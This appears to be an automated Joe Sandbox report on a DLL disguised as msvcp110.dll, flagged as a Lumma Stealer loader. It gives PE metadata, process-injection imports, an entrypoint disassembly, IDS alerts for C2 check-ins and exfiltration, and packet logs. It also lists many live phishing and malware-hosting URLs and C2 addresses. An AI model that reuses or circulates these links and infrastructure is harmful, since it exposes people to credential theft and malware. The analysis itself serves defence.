Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target aspnet_regiis.exe, PID 6200 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: msvcp110.dll

Simulations

Behavior and APIs

Time	Type	Description
15:59:02	API Interceptor	21x Sleep call for process: aspnet_regiis.exe modified
15:59:02	API Interceptor	1x Sleep call for process: loaddll32.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.97.3	https://is.gd/6NgVrQ	Get hash	malicious	HTMLPhisher	Browse	aa.opencompanies.co.uk/vEXJm/
	Comprobante de pago.xlam.xlsx	Get hash	malicious	Unknown	Browse	paste.ee/d/KXy1F
	01YP9Lwum8.exe	Get hash	malicious	DCRat	Browse	77777cm.nyashtyan.in/externalpipejsprocessAuthapiDbtrackWordpressCdn.php
	PO-000041522.exe	Get hash	malicious	FormBook	Browse	www.freedietbuilder.online/nnla/
	http://onlinecheapflights.net/	Get hash	malicious	Unknown	Browse	onlinecheapflights.net/
	Technical Datasheet and Specification_PDF.exe	Get hash	malicious	Unknown	Browse	www.rihanaroly.sbs/othk/?0dk=RykyQ3QZ+r1dqZwhAQupYMuQy26h2PYi8Fyfl3RAfHSVFgYOfXbCDUNV+aNHe22U393WzLygMMdANTa+vksg1hx1LENxGTGsZa2bATkiGgfiS6KvHA==&urk=NXuT
	request-BPp -RFQ 0975432.exe	Get hash	malicious	PureLog Stealer	Browse	www.ergeneescortg.xyz/guou/
	Halkbank_Ekstre_20230426_075819_154055.exe	Get hash	malicious	FormBook	Browse	www.thetahostthe.top/9r5x/
	http://comodozeropoint.com/updates/1736162964/N1/Team.exe	Get hash	malicious	Unknown	Browse	comodozeropoint.com/updates/1736162964/N1/Team.exe
	SecuriteInfo.com.Win32.MalwareX-gen.14607.6011.exe	Get hash	malicious	Unknown	Browse	servicetelemetryserver.shop/api/index.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
withdrwblon.cyou	Loader.exe	Get hash	malicious	LummaC	Browse	188.114.96.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	Setup.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	Loader.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	https://onlinepdf-qrsharedfile.com/index.html#XYW5uaWUua3lwcmlhbm91QGxjYXR0ZXJ0b24uY29t	Get hash	malicious	HTMLPhisher	Browse	104.16.123.96
	https://t.ly/8Lgfk	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	104.17.25.14
	phish_alert_sp2_2.0.0.0 (1).eml	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://view.flodesk.com/emails/671a6d1f7ce9f793bb70518a	Get hash	malicious	Unknown	Browse	104.18.18.100
	http://boulos-sharepoint.com	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	la.bot.mips.elf	Get hash	malicious	Unknown	Browse	8.40.143.15
	https://u47751895.ct.sendgrid.net/ls/click?upn=u001.LUpianUM71xe7PV7wDA6i1kcuy38W249FfPzE-2Fn4iGArrL0MQBCUZHFEzmfBrwW7hf5h8aNQUml0OSIHqpXf0Hd-2FwQBg2gsGxKHK7PsY2xc-3DPya1_YT5LbHmSQ6soq50ixwpFbSYZshuq6-2FPFgRa8NDnR03IYhL-2F9Rsp4maHC7HKUeszLncLvtZaWCVsMwsguQ5-2FbgriKbvHymTrFFrqjql1V0tvMkZQvyA1xxy-2B6NtGFoUeUGIrvdabsXN8enx2k5c-2BvLXzm-2BRXmD29Cf33DbXC513Cwkuo46G2I7a1uwsANH8eVhz8r5XyLPneRi4ngixWtQkBEaLBBKkl5CzEPySNlMnqJuuWiTBlFswgUf9EX-2BEhUpqAvMFuAlKTpYcteS-2FjAegbPmUSDcSeBkfnhL6yUhTFHUFrxra-2BdIgnamsXKUUqu-2BC45G51EOfBd9qOCqWy3OeOC7KYj3-2FcaIfcOAM1Jkvyddtn3gwRC5w97RLza-2BBM2JcZLNzMYva4SJzBZv7RClCaMcjevyjP6ZFvlR0NECf5zAmWbPLmCUnefze8ZyTvnDqXVb3nrflSdnTlNxWfm617xjOrSoSu-2BVHZVqbE92ZodSyvWqgaCWZg0TMDZeq64M67nuH9ryo7I5u80SS081vnMThCYiPoN3JUoUliQPKbNY46GxAPyVhMs4qqZVi-2FFUtIGEycXziXytxfy6JCzAZ2sa7DZusc1RftLAVM4uJit-2FAhxM-2FK1sEHsKHKvs9o7uDMExZ5YqEBjrD2XHch-2BY6xwRGGg56MeC1Bpa72xAoR6DmInmiEX4j92yaROEh1-2FMsHdtSstN7zc8gxU7ETVWVMBRLf6m4dTRruSfSNaLUi9QLq9d7Qfe8VMdKN1j9FMGIYia88728BDNNxRTaT4nSNITRr9JPa4Z1K1vdUocdyCKNcYSZsN8yguI0-2FqNXUfWFuoxnz5MDqwufLzxub8Fw-3D-3D	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	http://lowes.mooo.com/index.php?search=4&d16852&morde=354-1256&lm=400100KWWT29761&sd=15&page=9u6rpKHD2TMFWFa#izRRKlsmoFgLg4jmhaU9	Get hash	malicious	Phisher	Browse	188.114.96.3

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	Setup.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	Loader.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	SecuriteInfo.com.Other.Malware-gen.26961.24680.xlsx	Get hash	malicious	Unknown	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	188.114.97.3
	SecuriteInfo.com.Heur.11787.148.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3

File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.162338420980197
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	msvcp110.dll
File size:	618'496 bytes
MD5:	39bda6bbb72a50baa2dd3d3d6d55f17c
SHA1:	a3c63fb05a5a95520da960540117ec128d3c86e4
SHA256:	c95872dc3154d8688ce3ee0d4aa080c62012512a132c92e03db54c09e16891ed
SHA512:	dc56dade50bda2e3492781beafe83c8bfa861b7641cf8ffe2026fb55422578578ab22b754d5e6c3542763aac220285a508fb530c62cec6aac9d29663402bd79c
SSDEEP:	12288:NaQC2TRw8o1IKPB2EbEPA99drekfl/EUGygoOV+uyJdaIKqL1hI51M:82TRI1XB2EbEo9/XflyXonuyKqL1hQ
TLSH:	70D47C087D35C486E94CB4B6E46C77E8787547900EB08DDFBE466C083EBBEA114A635B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......4.vkp}.8p}.8p}.8;..9\|}.8;..9.}.8;..9d}.8;..9v}.8W.c8s}.8p}.8.}.8v..9Q}.8v..9`}.8v..9d}.8p}.8q}.8...9q}.8...9q}.8Richp}.8.......

File Icon


Icon Hash:	7ae282899bbab082

Static PE Info

General

Entrypoint:	0x1002ea2e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x6718B38B [Wed Oct 23 08:27:55 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	43480200b3c5eced3ea874108558123d

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007F634CF812C7h
call 00007F634CF817F0h
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+08h]
call 00007F634CF81173h
add esp, 0Ch
pop ebp
retn 000Ch
push ebp
mov ebp, esp
push 00000000h
call dword ptr [1003C06Ch]
push dword ptr [ebp+08h]
call dword ptr [1003C068h]
push C0000409h
call dword ptr [1003C034h]
push eax
call dword ptr [1003C070h]
pop ebp
ret
push ebp
mov ebp, esp
sub esp, 00000324h
push 00000017h
call dword ptr [1003C074h]
test eax, eax
je 00007F634CF812C7h
push 00000002h
pop ecx
int 29h
mov dword ptr [10096AD0h], eax
mov dword ptr [10096ACCh], ecx
mov dword ptr [10096AC8h], edx
mov dword ptr [10096AC4h], ebx
mov dword ptr [10096AC0h], esi
mov dword ptr [10096ABCh], edi
mov word ptr [10096AE8h], ss
mov word ptr [10096ADCh], cs
mov word ptr [10096AB8h], ds
mov word ptr [10096AB4h], es
mov word ptr [10096AB0h], fs
mov word ptr [10096AACh], gs
pushfd
pop dword ptr [10096AE0h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [10096AD4h], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [00096AD8h], eax

Rich Headers

Programming Language:

[IMP] VS2005 build 50727

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x42a80	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x42af8	0x64	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x98000	0x20c0	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x41e00	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x41d40	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x3c000	0x174	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x3aae3	0x3ac00	845c5bf89c9ac6b8666f9852b1875b01	False	0.4166264960106383	data	6.651611777985263	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x3c000	0x736e	0x7400	d5f50ac8948b9940b4ea9696a36d3fd3	False	0.4596241918103448	data	5.174072662448832	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x44000	0x53818	0x52a00	b5ee0b2508375b4654978fd617421581	False	0.5341338880484114	data	6.794092012081133	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x98000	0x20c0	0x2200	9996caf1a0c3489fbc4b537c92b4d148	False	0.7705652573529411	data	6.6028646075326165	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
USER32.dll	FillRect, BeginPaint, InvalidateRect, PostQuitMessage, DefWindowProcA, ShowWindow, EndPaint
GDI32.dll	TextOutA
ntdll.dll	NtWriteVirtualMemory, NtCreateThreadEx, NtSetContextThread, NtResumeThread, NtAllocateVirtualMemory, NtGetContextThread, RtlUnwind
KERNEL32.dll	WriteConsoleW, SetFilePointerEx, CreateFileW, TlsSetValue, GetConsoleMode, GetConsoleOutputCP, WriteFile, FlushFileBuffers, SetStdHandle, HeapReAlloc, HeapSize, GetCurrentProcess, GetModuleHandleA, K32GetModuleInformation, GetModuleFileNameA, CreateFileA, CreateFileMappingA, CloseHandle, MapViewOfFile, VirtualProtect, GetModuleHandleW, GetConsoleWindow, VirtualAlloc, CreateProcessW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, GetStringTypeW, RaiseException, InterlockedFlushSList, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, DecodePointer, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, EncodePointer, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, HeapAlloc, HeapFree, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, GetProcessHeap, GetStdHandle, GetFileType

Exports

Name	Ordinal	Address
GetGameData	1	0x100145a0

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-24T21:59:02.419807+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49705	188.114.97.3	443	TCP
2024-10-24T21:59:02.419807+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49705	188.114.97.3	443	TCP
2024-10-24T21:59:02.507601+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49704	188.114.97.3	443	TCP
2024-10-24T21:59:02.507601+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49704	188.114.97.3	443	TCP
2024-10-24T21:59:03.847808+0200	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.5	49707	188.114.97.3	443	TCP
2024-10-24T21:59:03.847808+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49707	188.114.97.3	443	TCP
2024-10-24T21:59:03.887044+0200	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.5	49706	188.114.97.3	443	TCP
2024-10-24T21:59:03.887044+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49706	188.114.97.3	443	TCP
2024-10-24T21:59:04.930985+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49708	188.114.97.3	443	TCP
2024-10-24T21:59:04.930985+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49708	188.114.97.3	443	TCP
2024-10-24T21:59:05.410474+0200	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.5	49709	188.114.97.3	443	TCP
2024-10-24T21:59:06.725100+0200	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.5	49711	188.114.97.3	443	TCP
2024-10-24T21:59:06.725100+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49711	188.114.97.3	443	TCP
2024-10-24T21:59:14.177252+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49724	188.114.97.3	443	TCP
2024-10-24T21:59:14.696311+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49726	188.114.97.3	443	TCP
2024-10-24T21:59:15.814450+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49727	188.114.97.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 24, 2024 21:59:01.215333939 CEST	49704	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:01.215348005 CEST	49705	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:01.215367079 CEST	443	49704	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:01.215377092 CEST	443	49705	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:01.215473890 CEST	49705	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:01.215481997 CEST	49704	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:01.216685057 CEST	49705	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:01.216698885 CEST	443	49705	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:01.216840982 CEST	49704	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:01.216859102 CEST	443	49704	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:01.859921932 CEST	443	49704	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:01.859994888 CEST	49704	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:01.864310980 CEST	49704	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:01.864324093 CEST	443	49704	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:01.864742994 CEST	443	49704	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:01.874583960 CEST	443	49705	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:01.874655962 CEST	49705	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:01.888479948 CEST	49705	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:01.888503075 CEST	443	49705	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:01.888829947 CEST	443	49705	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:01.907650948 CEST	49704	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:01.938914061 CEST	49705	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:01.957818031 CEST	49705	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:01.957847118 CEST	49705	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:01.957917929 CEST	443	49705	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:01.983828068 CEST	49704	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:01.983856916 CEST	49704	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:01.984076977 CEST	443	49704	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:02.419790983 CEST	443	49705	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:02.419892073 CEST	443	49705	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:02.419941902 CEST	49705	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:02.476145983 CEST	49705	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:02.476188898 CEST	443	49705	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:02.476206064 CEST	49705	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:02.476216078 CEST	443	49705	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:02.507483006 CEST	443	49704	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:02.507716894 CEST	443	49704	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:02.507775068 CEST	49704	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:02.511501074 CEST	49704	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:02.511524916 CEST	443	49704	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:02.511538982 CEST	49704	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:02.511548996 CEST	443	49704	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:02.723064899 CEST	49706	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:02.723092079 CEST	443	49706	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:02.723186970 CEST	49706	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:02.723603010 CEST	49706	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:02.723620892 CEST	443	49706	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:02.728959084 CEST	49707	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:02.728996992 CEST	443	49707	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:02.729054928 CEST	49707	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:02.729341030 CEST	49707	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:02.729356050 CEST	443	49707	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:03.337373018 CEST	443	49706	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:03.337551117 CEST	49706	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:03.338828087 CEST	49706	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:03.338840961 CEST	443	49706	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:03.339164972 CEST	443	49706	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:03.340409040 CEST	49706	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:03.340424061 CEST	49706	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:03.340503931 CEST	443	49706	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:03.347986937 CEST	443	49707	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:03.348089933 CEST	49707	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:03.349832058 CEST	49707	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:03.349843025 CEST	443	49707	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:03.350167036 CEST	443	49707	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:03.351614952 CEST	49707	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:03.351633072 CEST	49707	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:03.351696968 CEST	443	49707	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:03.780495882 CEST	49708	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:03.780555964 CEST	443	49708	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:03.780638933 CEST	49708	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:03.781575918 CEST	49708	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:03.781605005 CEST	443	49708	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:03.847788095 CEST	443	49707	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:03.847870111 CEST	443	49707	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:03.847909927 CEST	443	49707	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:03.847918987 CEST	49707	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:03.847953081 CEST	443	49707	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:03.847995043 CEST	49707	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:03.847996950 CEST	443	49707	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:03.848011971 CEST	443	49707	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:03.848052979 CEST	49707	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:03.848061085 CEST	443	49707	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:03.848234892 CEST	443	49707	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:03.848273039 CEST	443	49707	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:03.848284960 CEST	49707	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:03.848292112 CEST	443	49707	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:03.848360062 CEST	49707	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:03.886976004 CEST	443	49706	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:03.887042999 CEST	443	49706	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:03.887089014 CEST	443	49706	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:03.887108088 CEST	49706	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:03.887128115 CEST	443	49706	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:03.887167931 CEST	49706	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:03.887175083 CEST	443	49706	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:03.887217999 CEST	443	49706	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:03.887281895 CEST	443	49706	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:03.887299061 CEST	49706	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:03.887305021 CEST	443	49706	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:03.887693882 CEST	443	49706	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:03.887748957 CEST	49706	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:03.887757063 CEST	443	49706	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:03.887808084 CEST	49706	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:03.965516090 CEST	443	49707	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:03.965594053 CEST	443	49707	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:03.965630054 CEST	443	49707	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:03.965682030 CEST	49707	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:03.965703011 CEST	443	49707	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:03.965745926 CEST	49707	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:03.965753078 CEST	443	49707	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:03.965837955 CEST	443	49707	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:03.966590881 CEST	49707	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:03.966634989 CEST	49707	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:03.966659069 CEST	443	49707	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:03.966671944 CEST	49707	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:03.966677904 CEST	443	49707	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:04.004862070 CEST	443	49706	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:04.004957914 CEST	443	49706	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:04.005002022 CEST	443	49706	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:04.005021095 CEST	49706	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:04.005039930 CEST	443	49706	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:04.005085945 CEST	49706	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:04.005091906 CEST	443	49706	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:04.005166054 CEST	443	49706	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:04.005209923 CEST	49706	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:04.005352020 CEST	49706	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:04.005352020 CEST	49706	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:04.005369902 CEST	443	49706	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:04.005379915 CEST	443	49706	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:04.104222059 CEST	49709	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:04.104264975 CEST	443	49709	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:04.104470015 CEST	49709	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:04.104633093 CEST	49709	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:04.104640961 CEST	443	49709	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:04.136609077 CEST	49710	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:04.136651039 CEST	443	49710	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:04.136719942 CEST	49710	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:04.136971951 CEST	49710	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:04.136981964 CEST	443	49710	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:04.401154041 CEST	443	49708	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:04.401400089 CEST	49708	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:04.402462959 CEST	49708	443	192.168.2.5	188.114.97.3
Oct 24, 2024 21:59:04.402475119 CEST	443	49708	188.114.97.3	192.168.2.5
Oct 24, 2024 21:59:04.402798891 CEST	443	49708	188.114.97.3	192.168.2.5
